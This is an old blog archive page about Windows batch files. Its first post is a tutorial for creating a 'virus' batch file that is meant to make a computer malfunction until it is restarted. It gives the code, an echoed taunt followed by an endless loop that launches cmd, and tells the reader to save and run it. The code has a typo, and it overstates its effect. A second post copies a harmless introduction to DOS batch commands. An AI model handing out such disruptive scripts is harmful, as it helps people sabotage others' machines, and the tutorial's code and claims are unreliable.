Archive

Archive for the ‘BATCH (.bat)’ Category

Danger Virus file creation- Say boss

October 22, 2011 Leave a comment
Hi friends this is a tutorial on creating the virus in the system which will not all allow the system to run. One can use the simple multiple file opening just by clicking it. this will make the whole system run malfunction. only way is to restart the system.

STEP 1. Open notepad

STEP 2. Type the following code                                      

Add caption
                                     
@echo off
color c
@echo off
TITLE Boss.J
@echo PROMPT GVS: 
@echo off
pasue
echo shahabaz Virus attack             
pause
:loop 
cmd
goto loop


STEP 3. After typing the this code or copying it to notepad save in this format
                                                            filename.bat

STEP 4. Now open the saved file


Categories: BATCH (.bat)

sample batch files zip

October 22, 2011 Leave a comment

BATCH FILE MAGIC

Technically, DOS provides just eight basic batch file commands — CALL, ECHO, FOR, GOTO, IF, PAUSE, REM, and SHIFT — plus a tiny assortment of miscellaneous doodads: replaceable parameters, environment variables, labels, double == signs, and @ signs. That’s it! Not too much to learn, even for the most fervent DOS-hater. But the tools these few commands can create will astonish you.

The quickest way to learn the “doings” and syntax for each of the commands is too use MS-DOS’s HELP program. Want to check out CALL? Type either
    

CALL /? or HELP CALL
at the prompt and DOS will display either a few lines of help (CALL /?) or open up its reference database (HELP CALL) with examples and usage syntax.

PC Computing – DOS Power Tools by Paul Somerson

Limited though it may seem to some, other people perform magic using DOS’ batch language without “extensions”.

Take a look at the tips and examples presented on these pages and in the links to other sites, and see for yourself that batch files are more powerful and versatile than you had ever thought possible.
Wherever “DOS” is referred to, MS-DOS 5 or any later version, including the COMMAND sessions of Windows NT and OS/2, is meant.
When “NT” is referred to, Windows NT 4 is meant, unless specifically stated otherwise. As far as I know most NT 4 commands work in Windows 2000. Where Windows 2000 has some additional functionality, the added options will be shown in magenta.
When “OS/2” is referred to, OS/2 Warp 3 or later is meant.
Windows NT 4 / 2000 / XP users, you can use AllHelp.bat or AllHelp.vbs to generate a list of commands available in your operating system (and in the language of your OS).
The main focus of this site will be on COMMAND.COM’s and CMD.EXE’s internal commands and on undocumented features and unusual use of features.
On magic, more or less.
I’m always open to new tips and suggestions.
If you see a DOS version mentioned as a minimum requirement, remember that I do not have access to every DOS version, so I cannot and did not test every feature in every DOS version.

download here>> Batch files zip

Categories: BATCH (.bat)